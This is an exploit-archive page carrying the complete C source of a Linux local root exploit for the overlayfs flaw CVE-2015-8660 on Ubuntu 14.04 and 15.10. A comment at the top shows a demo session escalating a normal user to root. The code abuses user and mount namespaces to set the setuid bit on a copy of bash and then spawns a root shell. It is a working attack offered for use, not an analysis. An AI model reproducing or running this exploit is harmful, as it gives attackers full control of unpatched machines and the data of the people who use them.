Ubuntu 14.04 LTS / 15.10 overlayfs Local Root

2016-01-0600:00:00

rebel

packetstormsecurity.com

0.001 Low

EPSS

Percentile

45.1%

JSON

`/*  
just another overlayfs exploit, works on kernels before 2015-12-26  
  
# Exploit Title: overlayfs local root  
# Date: 2016-01-05  
# Exploit Author: rebel  
# Version: Ubuntu 14.04 LTS, 15.10 and more  
# Tested on: Ubuntu 14.04 LTS, 15.10  
# CVE : CVE-2015-8660  
  
blah@ubuntu:~$ id  
uid=1001(blah) gid=1001(blah) groups=1001(blah)  
blah@ubuntu:~$ uname -a && cat /etc/issue  
Linux ubuntu 3.19.0-42-generic #48~14.04.1-Ubuntu SMP Fri Dec 18 10:24:49 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux  
Ubuntu 14.04.3 LTS \n \l  
blah@ubuntu:~$ ./overlayfail  
root@ubuntu:~# id  
uid=0(root) gid=1001(blah) groups=0(root),1001(blah)  
  
12/2015  
by rebel  
  
6354b4e23db225b565d79f226f2e49ec0fe1e19b  
*/  
  
#include <stdio.h>  
#include <sched.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <sched.h>  
#include <sys/stat.h>  
#include <sys/types.h>  
#include <sys/mount.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <sched.h>  
#include <sys/stat.h>  
#include <sys/types.h>  
#include <sys/mount.h>  
#include <sys/types.h>  
#include <signal.h>  
#include <fcntl.h>  
#include <string.h>  
#include <linux/sched.h>  
#include <sys/wait.h>  
  
static char child_stack[1024*1024];  
  
static int  
child_exec(void *stuff)  
{  
system("rm -rf /tmp/haxhax");  
mkdir("/tmp/haxhax", 0777);  
mkdir("/tmp/haxhax/w", 0777);  
mkdir("/tmp/haxhax/u",0777);  
mkdir("/tmp/haxhax/o",0777);  
  
if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {  
fprintf(stderr,"mount failed..\n");  
}  
  
chmod("/tmp/haxhax/w/work",0777);  
chdir("/tmp/haxhax/o");  
chmod("bash",04755);  
chdir("/");  
umount("/tmp/haxhax/o");  
return 0;  
}  
  
int  
main(int argc, char **argv)  
{  
int status;  
pid_t wrapper, init;  
int clone_flags = CLONE_NEWNS | SIGCHLD;  
struct stat s;  
  
if((wrapper = fork()) == 0) {  
if(unshare(CLONE_NEWUSER) != 0)  
fprintf(stderr, "failed to create new user namespace\n");  
  
if((init = fork()) == 0) {  
pid_t pid =  
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);  
if(pid < 0) {  
fprintf(stderr, "failed to create new mount namespace\n");  
exit(-1);  
}  
  
waitpid(pid, &status, 0);  
  
}  
  
waitpid(init, &status, 0);  
return 0;  
}  
  
usleep(300000);  
  
wait(NULL);  
  
stat("/tmp/haxhax/u/bash",&s);  
  
if(s.st_mode == 0x89ed)  
execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);  
  
fprintf(stderr,"couldn't create suid :(\n");  
return -1;  
}  
`